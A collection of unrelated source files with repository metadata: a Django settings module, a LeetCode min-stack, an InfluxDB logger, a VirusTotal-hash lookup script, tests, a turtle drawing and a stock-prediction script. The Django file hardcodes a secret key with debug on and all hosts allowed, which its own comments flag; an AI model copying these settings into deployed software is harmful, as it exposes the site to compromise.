33c31ecade4b4b77e84825f895244dbb093f7e64 | 67e96382f822c8e1fd4ed80aef42afc1582d8a2e | /main_web/everyoneSays/everyoneSays/settings.py | fc82ecb253f907159ffa918083e5cba0e6e54c27 | [] | no_license | Salaah01/everyoneSays | a6e33953bc63c660006c2a2b80d74748069cf0ef | 3954b0e308ead05fda27de6b4ad16a6fe4c7eb86 | refs/heads/master | 2023-08-05T09:15:12.694362 | 2020-07-13T23:28:31 | 2020-07-13T23:28:31 | 265,930,263 | 0 | 0 | null | 2021-09-22T19:05:27 | 2020-05-21T19:06:27 | Python | UTF-8 | Python | false | false | 3,264 | py | """
Django settings for everyoneSays project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# Project root: two levels up from this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; for production,
# load it from an environment variable and rotate the exposed value.
SECRET_KEY = 'mx!$^gnjo-*#nrv#&&pg+ck2!sz^-_f7q%(z08$!*fc&xs5&j4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# NOTE(review): '*' accepts any Host header; restrict to real hostnames
# before deploying.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'everyoneSays.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'everyoneSays.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
# SQLite file in the project root — fine for development.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'GMT'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'everyoneSays/static')
]
| [
"salaah_amin@hotmail.co.uk"
] | salaah_amin@hotmail.co.uk |
18d91998f069b763cffeb5751854cb7b5941f797 | c1e6716beacee4dfb4f4c167c76dac0e2fd7e412 | /LeetCode/简单1/最小栈.py | f2aa5b2e8265e00eefc927bf5bfbac3050f63471 | [] | no_license | xiyangxitian1/learn_days | 68922ee986d1e4d38e1162c41e122ae42a269fc7 | 971cc2f674d53cf33a621a3a608f32a53603438a | refs/heads/master | 2020-10-01T16:54:49.758022 | 2019-12-22T08:47:52 | 2019-12-22T08:47:52 | 227,581,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 917 | py | # 设计一个支持 push,pop,top 操作,并能在常数时间内检索到最小元素的栈。
#
# push(x) -- 将元素 x 推入栈中。
# pop() -- 删除栈顶的元素。
# top() -- 获取栈顶元素。
# getMin() -- 检索栈中的最小元素。
class MinStack:
"""
这样效率太低了
"""
def __init__(self):
"""
initialize your data structure here.
"""
self.list = list()
self.helper = list()
def push(self, x: int) -> None:
if not self.helper or self.helper[-1] >= x:
self.helper.append(x)
self.list.append(x)
def pop(self) -> None:
pop_num = self.list.pop()
if self.helper[-1] == pop_num:
self.helper.pop()
def top(self) -> int:
return self.list[-1] if self.list else None
def getMin(self) -> int:
return self.helper[-1] if self.helper else None
| [
"liyan@live.shop.edu.cn"
] | liyan@live.shop.edu.cn |
d05dbb737e6f7f1d13acf87f02e74b21e6cc590f | de6a49b76f940b2b015c45d8024d60ec0925b48f | /Logger.py | 06445e530c9232236636303faf499a7039eba3ee | [
"MIT"
] | permissive | purboday/app.REMAppGroups | a06aa644d63a81783fb71797a7c5e975e5c8d3fd | 4c4e18f1cfc147d8ff297b535dd6946d4dedd4bb | refs/heads/master | 2023-06-13T02:13:16.146912 | 2021-07-08T20:38:20 | 2021-07-08T20:38:20 | 384,240,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,128 | py | '''
Logger component
- log msg format: (tag, measurement, [ time ], [ values ])
'''
from riaps.run.comp import Component
from influxdb import InfluxDBClient
from influxdb.client import InfluxDBClientError
import json
import logging
from datetime import datetime
import os
import yaml
BATCH_SIZE = 60
class Logger(Component):
def __init__(self, configfile):
super().__init__()
_config = "config/" + configfile
with open(_config, 'r') as stream:
try:
db_config= yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
self.db_name = db_config['db_name']
self.db_drop = db_config['db_drop']
self.point_values = []
try:
self.client = InfluxDBClient(host=db_config['db_host'], port=db_config['db_port'],
database=db_config['db_name'], username=db_config['db_user'], password=db_config['db_password'])
self.client.create_database(db_config['db_name'])
self.client.switch_database(db_config['db_name'])
except:
self.logger.error('database connection failed')
self.client = None
def on_logData(self):
datastream = self.logData.recv_pyobj()
for point in datastream:
tag, measurement, times, values = point
assert len(times) == len(values)
if self.client == None: return
for i in range(len(times)):
self.point_values.append({
"time" : datetime.fromtimestamp(times[i]).isoformat()+'Z',
"tags" : tag,
"measurement" : measurement,
"fields" : values[i]
})
# if len(self.point_values) >= BATCH_SIZE:
# self.logger.info(str(self.point_values))
self.client.write_points(self.point_values)
self.point_values = []
def __destroy__(self):
if self.client and self.db_drop:
self.client.drop_database(self.db_name)
| [
"purboday.ghosh@vanderbilt.edu"
] | purboday.ghosh@vanderbilt.edu |
b4690585fbf3c801c4aec722657c104880b028c8 | 74020bb83e915ee7f5da8b9dd3efc35bb142cb2a | /jsonreader.py | ab79acd9095c38cef165a36096ac69294bd519a8 | [] | no_license | SiddharthMalhotra/Code-Signing-PKI-Certificates | 62ce4124c97d9d8db9241906f697f7e9a5d8c72e | ede8eecd949d49f791a74259234519b739f69868 | refs/heads/master | 2020-05-30T15:57:19.741092 | 2019-11-19T03:32:33 | 2019-11-19T03:32:33 | 189,830,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | import json
# path = '/Users/siddharth/Downloads/responses_windows_virushashes_316.json'
#
# with open(path, 'r') as jsonfile:
# for line in jsonfile:
# dict = json.loads(line)
# print(dict['md5'])
#
# for line in signedfile:
# print (line)
#path = ''
textfile = '/home/ubuntu/MyVolumeStore/textfile.txt'
with open('/home/ubuntu/MyVolumeStore/signedfile') as signedfile:
    for line in signedfile:
        # Bug fix: lines read from a file keep their trailing newline, so
        # the comparison against the bare md5 field below could never match.
        md5 = line.strip()
        # Scan response dumps numbered 307..315.
        for i in range(7, 16):
            filenumber = 300 + i
            path = '/home/ubuntu/MyVolumeStore/Virustotal_Responses/responses_windows_virushashes_%d.json' % filenumber
            with open(path) as responsefile:
                for linejson in responsefile:
                    # renamed from ``dict``, which shadowed the builtin
                    record = json.loads(linejson)
                    if md5 == record['md5']:
                        # NOTE(review): mode 'w' truncates on every match, so
                        # only the LAST matching record survives — use 'a'
                        # if all matches should be collected.
                        with open(textfile, 'w') as txte:
                            txte.write(linejson)
                            txte.flush()
| [
"codemalhotra@gmail.com"
] | codemalhotra@gmail.com |
5b772f0474910e3f52bb061eeaf15773a593dab4 | c57edb2fe918e6b33c5903dbc63b9bcbcf8f847f | /indeed_company_reviews/items.py | 21ebb81a2e41ec6c2e30fce63b486fcd6900858e | [
"MIT"
] | permissive | zehengl/scrapy-indeed-company-reviews | cf381b2f458624539057afe01880046444f12616 | 4e39c06037eb92a086c6351a9ef37c7225599715 | refs/heads/main | 2023-08-20T07:29:59.319654 | 2023-08-14T13:39:29 | 2023-08-14T13:39:29 | 213,436,914 | 5 | 1 | MIT | 2023-09-11T14:55:13 | 2019-10-07T16:48:16 | Python | UTF-8 | Python | false | false | 409 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class IndeedCompanyReviewsItem(scrapy.Item):
    """Container for one scraped Indeed company review.

    Fields are populated by the spider; each holds the review attribute
    its name suggests (pros/cons are the optional review sub-sections).
    """
    id = scrapy.Field()
    rating = scrapy.Field()
    text = scrapy.Field()
    pros = scrapy.Field()
    cons = scrapy.Field()
    position = scrapy.Field()
    date_created = scrapy.Field()
| [
"imzehengl@gmail.com"
] | imzehengl@gmail.com |
98e562ae114e7698df9aeb8eb0c5698b79ad77da | d860c407d7757f9ca8dc814a2b24a1687a98b9db | /ifmodels/tests/test_ifmodels.py | c6e4e0dc5f8741172ba1fe3552dd7f9772eab16c | [
"MIT"
] | permissive | serrob23/ifmodels | c6f34afb28f6561c49127619df5247ff04eb49ac | c39902d6d1ca79275f9c250fafd9fb07c7b09f48 | refs/heads/master | 2020-09-14T04:09:26.332819 | 2019-11-18T19:18:58 | 2019-11-18T19:18:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,949 | py | from __future__ import absolute_import, division, print_function
import os.path as op
import numpy as np
import pandas as pd
import numpy.testing as npt
import ifmodels as sb
data_path = op.join(sb.__path__[0], 'data')
def test_transform_data():
    """
    Testing the transformation of the data from raw data to functions
    used for fitting a function.
    """
    # We start with actual data. We test here just that reading the data in
    # different ways (DataFrame vs. file path) ultimately generates the same
    # arrays.
    ortho = pd.read_csv(op.join(data_path, 'ortho.csv'))
    x1, y1, n1 = sb.transform_data(ortho)
    x2, y2, n2 = sb.transform_data(op.join(data_path, 'ortho.csv'))
    npt.assert_equal(x1, x2)
    npt.assert_equal(y1, y2)
    # We can also be a bit more critical, by testing with data that we
    # generate, and should produce a particular answer. The expected arrays
    # below imply: x = unique contrast levels, y = fraction of trials with
    # answer == 1 per level, n = trial count per level.
    my_data = pd.DataFrame(
        np.array([[0.1, 2], [0.1, 1], [0.2, 2], [0.2, 2], [0.3, 1],
                  [0.3, 1]]),
        columns=['contrast1', 'answer'])
    my_x, my_y, my_n = sb.transform_data(my_data)
    npt.assert_equal(my_x, np.array([0.1, 0.2, 0.3]))
    npt.assert_equal(my_y, np.array([0.5, 0, 1.0]))
    npt.assert_equal(my_n, np.array([2, 2, 2]))
def test_cum_gauss():
    """Sanity-check cumgauss: shape preservation, symmetry, and the
    ~68%-within-one-sigma property of the Gaussian."""
    sigma = 1
    mu = 0
    x = np.linspace(-1, 1, 12)
    y = sb.cumgauss(x, mu, sigma)
    # A basic test that the input and output have the same shape:
    npt.assert_equal(y.shape, x.shape)
    # The function evaluated over items symmetrical about mu should be
    # symmetrical relative to 0 and 1:
    npt.assert_equal(y[0], 1 - y[-1])
    # Approximately 68% of the Gaussian distribution is in mu +/- sigma, so
    # the value of the cumulative Gaussian at mu - sigma (here x[0] = -1)
    # should be approximately equal to (1 - 0.68/2). Note the low precision!
    npt.assert_almost_equal(y[0], (1 - 0.68) / 2, decimal=2)
def test_opt_err_func():
    """The residual function should be all-zero whenever the candidate
    function with the given params reproduces y exactly."""
    # We define a truly silly function, that returns its input, regardless of
    # the params:
    def my_silly_func(x, my_first_silly_param, my_other_silly_param):
        return x
    # The silly function takes two parameters and ignores them
    my_params = [1, 10]
    my_x = np.linspace(-1, 1, 12)
    my_y = my_x
    my_err = sb.opt_err_func(my_params, my_x, my_y, my_silly_func)
    # Since x and y are equal, the error is zero:
    npt.assert_equal(my_err, np.zeros(my_x.shape[0]))
    # Let's consider a slightly less silly function, that implements a linear
    # relationship between inputs and outputs:
    def not_so_silly_func(x, a, b):
        return x * a + b
    my_params = [1, 10]
    my_x = np.linspace(-1, 1, 12)
    # To test this, we calculate the relationship explicitly:
    my_y = my_x * my_params[0] + my_params[1]
    my_err = sb.opt_err_func(my_params, my_x, my_y, not_so_silly_func)
    # Since my_y was generated with exactly these params, the residual
    # error is again zero (the original comment about x == y was wrong
    # here — x and y differ, but the model matches y perfectly):
    npt.assert_equal(my_err, np.zeros(my_x.shape[0]))
def test_Model():
    """Round-trip: fitting data generated by cumgauss, starting at the true
    parameters, must reproduce the data exactly."""
    M = sb.Model()
    x = np.linspace(0.1, 0.9, 22)
    target_mu = 0.5
    target_sigma = 1
    target_y = sb.cumgauss(x, target_mu, target_sigma)
    # Initialize at the true parameters, so the optimizer has nothing to do.
    F = M.fit(x, target_y, initial=[target_mu, target_sigma])
    npt.assert_equal(F.predict(x), target_y)
def test_params_regression():
    """
    Test for regressions in model parameter values from provided data
    """
    # The constants below are golden values from a known-good run; if the
    # fitting procedure changes legitimately, update them deliberately.
    model = sb.Model()
    ortho_x, ortho_y, ortho_n = sb.transform_data(op.join(data_path,
                                                          'ortho.csv'))
    para_x, para_y, para_n = sb.transform_data(op.join(data_path,
                                                       'para.csv'))
    ortho_fit = model.fit(ortho_x, ortho_y)
    para_fit = model.fit(para_x, para_y)
    npt.assert_almost_equal(ortho_fit.params[0], 0.46438638)
    npt.assert_almost_equal(ortho_fit.params[1], 0.13845926)
    npt.assert_almost_equal(para_fit.params[0], 0.57456788)
    npt.assert_almost_equal(para_fit.params[1], 0.13684096)
| [
"hhelmbre@uw.edu"
] | hhelmbre@uw.edu |
51f4649bf759480ec9f0b4d51f2d6673e0ada97d | 785e23fbff3e696be7abdcac0aa5f42122008656 | /wax/utils.py | 72f8fa251c094d0d3664fa56974579073428c0be | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | zggl/wax-ml | 329c079944728d4f621f70f6b0af0b95c256c3ee | ab18e064f9fa1c95458978f501efb6cde9ab64d5 | refs/heads/main | 2023-05-30T17:56:15.739249 | 2021-06-14T05:32:17 | 2021-06-14T05:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | # Copyright 2021 The WAX-ML Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Some utils functions used in WAX-ML."""
from jax import tree_flatten
def dict_map(fun, col):
    """Return a new dict mapping each key of *col* to ``fun(value)``."""
    return dict(zip(col.keys(), map(fun, col.values())))
def get_unique_dtype(current_values_):
    """Return the single dtype type shared by all leaves of a pytree.

    Raises AssertionError when the leaves mix dtypes.
    TODO: remove once multi-dtype is supported.
    """
    leaves, _ = tree_flatten(current_values_)
    dtypes = {leaf.dtype.type for leaf in leaves}
    assert (
        len(dtypes) == 1
    ), "multi-dtype not yet supported. TODO: manage multi-dtypes at Buffer level."
    return dtypes.pop()
| [
"eserie@gmail.com"
] | eserie@gmail.com |
3448b0f6f83f62a63acde23c7dd30c2bb745738e | 06f1cc6a29ff6c012d4c97e18d385ee9f5e68510 | /tiktorch/server/__main__.py | 3f1cdfc204cb3c9d2cee8d332921c0458fea517d | [
"MIT"
] | permissive | Phhere/tiktorch | c9d076362efcdd5f5fb31da2b9acbc60b07648ac | 82f109b4d82dda4b63a5d93e5527fc409a9fd4c1 | refs/heads/master | 2022-12-01T07:26:14.738435 | 2020-07-01T17:15:37 | 2020-07-01T17:15:37 | 285,004,592 | 0 | 0 | MIT | 2020-08-04T14:26:50 | 2020-08-04T14:26:49 | null | UTF-8 | Python | false | false | 74 | py | import sys
from .base import main
# Entry point when run as ``python -m tiktorch.server``.
if __name__ == "__main__":
    main()
| [
"mnovikov.work@gmail.com"
] | mnovikov.work@gmail.com |
2b7fc1a39dba6cc34d44ed9341815126919b7b5c | 61a43dbd5ee615bf5e5f8f52e739efdfe5b57443 | /func.py | db6fd07e95a76f4f910b2633cfad4dcb6a878493 | [] | no_license | tianqibucuohao/MyPython | 6edef8fa2635862914af26f96b3fb630a0198403 | 12b9689882dc197128d1a27b68c9a2840a57d0fc | refs/heads/master | 2020-04-07T15:04:09.838646 | 2020-01-09T09:03:48 | 2020-01-09T09:03:48 | 158,471,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | def fib(n):
    # Print every Fibonacci number strictly below n, space-separated,
    # by repeatedly advancing the (a, b) pair.
    a,b=0,1
    while a<n:
        print(a,end=' ')
        a,b=b,a+b
def output(name, base,shuqiang, wuli, liliang,jineng,huangzi,baizi,baoji, zuizhong):
    """Compute and print the damage output for *name*.

    ``wuli`` and ``liliang`` are percentages (divided by 100); the other
    modifiers are applied as raw fractional bonuses. Factors are multiplied
    left to right in the same order as the original expression.
    """
    bonuses = (
        1 + wuli / 100,
        1 + liliang / 100,
        1 + huangzi,
        1 + baizi,
        1 + baoji,
        1 + jineng,
        1 + zuizhong,
    )
    outsum = base * shuqiang / 220
    for factor in bonuses:
        outsum *= factor
    print(name, "output:", outsum)
def main():
    """Evaluate output() with a baseline stat line.

    The commented blocks below are earlier what-if comparisons for the
    "90a" / "95a" configurations, kept for reference.
    """
    base=100
    shuqiang=100
    wuli=100
    liliang=100
    jineng=100
    huangzi=0.0
    baizi=0.0
    baoji=0.0
    zuizhong=0.0
    output("now",base,shuqiang, wuli,liliang,jineng,huangzi,baizi,baoji,zuizhong)
    # nowbaoji=baoji+0.5
    # nowhuangzi=huangzi+0.2+0.1
    # nowbaizi=baizi+0.33
    # nowwuli=wuli+0.22+0.1
    # nowzuizhong=zuizhong+0.2
    # nowjineng=jineng+0.1+0.1
    # nowshuqinag=shuqiang+60
    # nowliliang=liliang+0.15
    # output("90a",base,nowshuqinag,nowwuli,nowliliang,nowjineng,nowhuangzi, nowbaizi,nowbaoji,nowzuizhong)
    #
    # jineng95=jineng+0.17+0.1+0.1
    # baizi95=baizi+0.19+0.1
    # zuizhong95=zuizhong+0.2+0.2+0.1
    # liliang95=liliang+0.18+0.15
    # baoji95=baoji+0.19
    # wuli95=wuli+0.64+0.22+0.1
    # output("95a",base,nowshuqinag,wuli95,liliang95,jineng95,huangzi,baizi95,baoji95,zuizhong95)
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
"lichzhenglz@gmail.com"
] | lichzhenglz@gmail.com |
d254744b9ce6435292926760131839bbb3f92a19 | 74636ca1845d0547acc3420ffa91ebcc31534b14 | /maxFunctions.py | 31c1672870b408af64c08d8eb27f0c5c690a2e44 | [] | no_license | Maksym-Gorbunov/python1 | 3f61e89aef6098b44bda3419f4a7c1ea74f7ad58 | b700e5fe625548c3975ad3aad062302f3791f61f | refs/heads/master | 2020-03-07T19:44:38.091739 | 2018-04-10T11:50:09 | 2018-04-10T11:50:09 | 127,679,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | def hello(name):
print ('Hello ' + name.capitalize() + ',\nWelkome onboard!')
#print ('Hello', name.capitalize(), ',\nWelkome onboard!') | [
"maxsverige@hotmail.com"
] | maxsverige@hotmail.com |
351b07b6aa81c5d1c935735b8eb4427e0f537c99 | e97f23138816994d17586e0f64a7dfa8bd72c421 | /app/forms.py | f21f7c41fa2005d3a5ece287c093e49973a026d6 | [] | no_license | thtruo/microblog | 4f9aaabcd7489b8b750a74efae3d2842c13fd56a | 0eb5268cdc94ab71f067c1a99ca5676602784022 | refs/heads/master | 2020-06-07T06:41:56.391028 | 2014-02-07T21:38:05 | 2014-02-07T21:38:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | from flask.ext.wtf import Form
from wtforms import TextField, BooleanField
from wtforms.validators import Required
class LoginForm(Form):
    """OpenID sign-in form (Flask-WTF)."""
    # the OpenID URL; submission fails validation when empty
    openid = TextField('openid', validators = [Required()])
    # persistence checkbox, unchecked by default
    remember_me = BooleanField('remember me', default = False)
| [
"ttruongchau@gmail.com"
] | ttruongchau@gmail.com |
d04cf7fede3b16a342b169e8aeeb36e1e13ddd33 | 7bd08408726c2c9e5314ccaa8d6b59913b5858a9 | /src/selfcoin/node/ui/access.py | a286cc7719123124a11749337ff90784966a480b | [
"MIT"
] | permissive | wangyubin112/selfcoin | 1251064771e592aee7f82c766ba6fdbc9d204fed | f53528645f7d500108c7a258f07a2551f933ce7b | refs/heads/master | 2020-04-26T13:41:47.285025 | 2019-03-19T01:42:16 | 2019-03-19T01:42:16 | 173,587,318 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | from tkinter import *
# Layout constants: the tab is divided into `section` horizontal bands;
# x/y are relative padding steps and x_col is the column multiplier for
# the entry/button column.
section = 2
x = 0.05
y = 0.15/6*section
x_col = 5
# NOTE: despite the name this is a font *family* string, not a size;
# the parentheses are redundant ('Arial' is a plain str).
font_size = ('Arial')


def access(ui):
    """Build the register and login/logout panels on ``ui.tab_access``.

    Widgets are attached as attributes of *ui* so other UI code can read
    entries and toggle button state; buttons dispatch through ui.handler.
    """
    ui.regist_frame = Frame(ui.tab_access)
    ui.login_frame = Frame(ui.tab_access)
    # Stack the two frames vertically, each taking 1/section of the height.
    ui.regist_frame.place(relx = 0, rely = 0, relwidth=1.0, relheight=1.0/section)
    ui.login_frame.place(relx = 0, rely = 1.0/section, relwidth=1.0, relheight=1.0/section)
    # regist
    ui.regist_name_label = Label(ui.regist_frame, text = 'name:',font=font_size)
    ui.regist_name_label.place(relx=x, rely=y)
    ui.regist_name_entry = Entry(ui.regist_frame, show = None, width=50)
    ui.regist_name_entry.place(relx = x_col * x, rely=y)
    ui.regist_ID_real_label = Label(ui.regist_frame, text = 'real ID:',font=font_size)
    ui.regist_ID_real_label.place(relx=x, rely=2*y)
    ui.regist_ID_real_entry = Entry(ui.regist_frame, show = None, width=50)
    ui.regist_ID_real_entry.place(relx = x_col * x, rely=2*y)
    # StringVar so the button caption can be changed by handlers later.
    ui.regist_status = StringVar()
    ui.regist_status.set('regist')
    ui.regist_button = Button(ui.regist_frame, textvariable = ui.regist_status,
        command = lambda : ui.handler(ui.regist))
    ui.regist_button.place(relx = x_col* x, rely = 3*y)
    # login/logout
    ui.login_label = Label(ui.login_frame, text = 'name:',font=font_size)
    ui.login_label.place(relx=x,rely=y)
    ui.login_entry = Entry(ui.login_frame, show = None, width=50)
    ui.login_entry.place(relx = x_col* x, rely = y)
    ui.login_status = StringVar()
    ui.login_status.set('login')
    ui.login_button = Button(ui.login_frame, textvariable = ui.login_status,
        command = lambda : ui.handler(ui.login))
    ui.login_button.place(relx = x_col * x, rely = 2*y)
    ui.logout_status = StringVar()
    ui.logout_status.set('logout')
    # NOTE(review): tkinter's documented state value is 'disabled';
    # 'disable' may raise TclError at widget creation — verify.
    ui.logout_button = Button(ui.login_frame, textvariable = ui.logout_status,
        command = lambda : ui.handler(ui.logout), state = 'disable')
    ui.logout_button.place(relx = x_col * x, rely = 4*y)
| [
"noreply@github.com"
] | wangyubin112.noreply@github.com |
f0ae133e7bf186976ce43043d3ba3f0c7f0bbb9f | 9768e9dfef5e242d5c2604f46177a7b77345b2cc | /practice/201710963_12-02.py | 2252ee750b268059e5d05bb69e26fa82b9739b72 | [] | no_license | kjee99/CT-201710963 | f1bc482752f825171091042718d6454254a7241f | dc4f6de5a553b51ffe99229baa076dbd5decd24a | refs/heads/master | 2021-01-19T09:37:41.625452 | 2017-05-29T08:12:19 | 2017-05-29T08:12:19 | 87,774,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | import turtle
wn=turtle.Screen()
t1=turtle.Turtle()
width=wn.window_width()
w3=width/3
x1=0.0-w3
x2=0.0
x3=0.0+w3
def drawSquare(size):
    """Draw a square with side length ``size`` using clockwise turns."""
    # Four sides: move forward, then turn right 90 degrees each time.
    for _ in range(4):
        t1.forward(size)
        t1.right(90)
# Demo square, immediately erased (only the function definitions matter).
drawSquare(100)
t1.clear()
def triangle(size):
    """Draw an equilateral triangle with side ``size``, turning left."""
    for _ in range(3):
        t1.forward(size)
        t1.left(120)
def pentagon(size):
    """Draw a regular pentagon with side ``size``, turning left 72 degrees."""
    for _ in range(5):
        t1.forward(size)
        t1.left(72)
def star(size):
    """Draw a five-edge star shape with edge length ``size``."""
    # First three edges each end in a 150-degree clockwise turn.
    for _ in range(3):
        t1.forward(size)
        t1.right(150)
    # The last corner uses a 135-degree turn before the final edge.
    t1.forward(size)
    t1.right(135)
    t1.forward(size)
def drawTriangleAt(x, y, size):
    """Jump (pen up) to (x, y), face east, then draw a triangle of side ``size``."""
    t1.up()
    t1.goto(x, y)
    t1.down()
    t1.seth(0)
    triangle(size)
def drawPentagonAt(x, y, size):
    """Jump (pen up) to (x, y), face east, then draw a pentagon of side ``size``."""
    t1.up()
    t1.goto(x, y)
    t1.down()
    t1.seth(0)
    pentagon(size)
def drawStarAt(x, y, size):
    """Jump (pen up) to (x, y), face east, then draw a star of edge ``size``."""
    t1.up()
    t1.goto(x, y)
    t1.down()
    t1.seth(0)
    star(size)
# Draw the three shapes side by side (left, centre, right thirds of the
# window), then wait for a click to close.
drawTriangleAt(x1,0,100)
drawPentagonAt(x2,0,100)
drawStarAt(x3,0,100)
wn.exitonclick()
"noreply@github.com"
] | kjee99.noreply@github.com |
c32addfe05a464d16e025942398d9df189cfe880 | 110e9eb02d6c887a03eedc49ab65c0f70370c139 | /test/machine_learning.py | 08ce4867bfe40ef8685a8478a1b938abbbe62594 | [] | no_license | tylermoore19/stock-predictor | 7135d5e2e0d9b82654a370084ee43d1d46452e09 | 6ef6c3697407e6b13986bbd0d31ca4fa1f5ffa85 | refs/heads/master | 2022-07-18T00:02:17.157060 | 2019-10-30T21:48:14 | 2019-10-30T21:48:14 | 208,937,087 | 0 | 0 | null | 2022-06-22T02:58:13 | 2019-09-17T02:02:28 | Python | UTF-8 | Python | false | false | 6,750 | py | import math
import matplotlib
import numpy as np
import pandas as pd
import seaborn as sns
import time
import datetime
import pandas_datareader.data as web
from datetime import date, datetime, time, timedelta
from matplotlib import pyplot as plt
from pylab import rcParams
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
from tqdm import tqdm_notebook
# Experiment configuration.
test_size = 0.2 # proportion of dataset to be used as test set
cv_size = 0.2 # proportion of dataset to be used as cross-validation set
Nmax = 2 # for feature at day t, we use lags from t-1, t-2, ..., t-N as features
# Nmax is the maximum N we are going to test
fontsize = 14 # base font size for plots
ticklabelsize = 14 # tick-label font size for plots
def get_preds_mov_avg(df, target_col, N, pred_min, offset):
    """
    Predict df[target_col] at each timestep t as the simple moving average
    of the previous N observations (t-1, t-2, ..., t-N).

    Parameters
    ----------
    df : pandas.DataFrame holding the column to predict. Any length.
    target_col : name of the column to predict, e.g. 'adj_close'.
    N : moving-average window; the prediction at t uses values t-1 ... t-N.
    pred_min : floor applied to every prediction (all predictions >= pred_min).
    offset : predictions are returned only for df[offset:], e.g. offset can
        be the size of the training set.

    Returns
    -------
    numpy array of length len(df) - offset. The very first prediction of the
    series (row 0 of df) is NaN because no history exists for it.
    """
    # Rolling mean over up to N past values, shifted one step forward so the
    # value aligned with row t only uses information available before t.
    smoothed = df[target_col].rolling(window=N, min_periods=1).mean().shift(1)
    preds = smoothed.to_numpy()
    # Clamp predictions below the floor; np.maximum propagates the leading NaN.
    preds = np.maximum(preds, pred_min)
    return preds[offset:]
def get_mape(y_true, y_pred):
    """Return the mean absolute percentage error (MAPE), in percent."""
    actual = np.asarray(y_true)
    predicted = np.asarray(y_pred)
    relative_errors = np.abs((actual - predicted) / actual)
    return relative_errors.mean() * 100
# --- Data acquisition and chronological train/validation/test split ---
# end = datetime.today() + timedelta(0)
# start = end + timedelta(-730)
# Fixed two-year window so the run is reproducible.
end = datetime(2019, 8, 20)
start = datetime(2017, 8, 20)
# Download NASDAQ Composite daily OHLCV data from Yahoo Finance.
df = web.DataReader('^IXIC', 'yahoo', start, end)
df = df.reset_index()
# Convert Date column to datetime
df.loc[:, 'Date'] = pd.to_datetime(df['Date'],format='%Y-%m-%d')
# Change all column headings to be lower case, and remove spacing
df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]
# # Get month of each sample
# df['month'] = df['date'].dt.month
# Sort by datetime
df.sort_values(by='date', inplace=True, ascending=True)
# Get sizes of each of the datasets
num_cv = int(cv_size*len(df))
num_test = int(test_size*len(df))
num_train = len(df) - num_cv - num_test
print("num_train = " + str(num_train))
print("num_cv = " + str(num_cv))
print("num_test = " + str(num_test))
# Split into train, cv, and test -- chronological slices, never shuffled,
# because this is a time series.
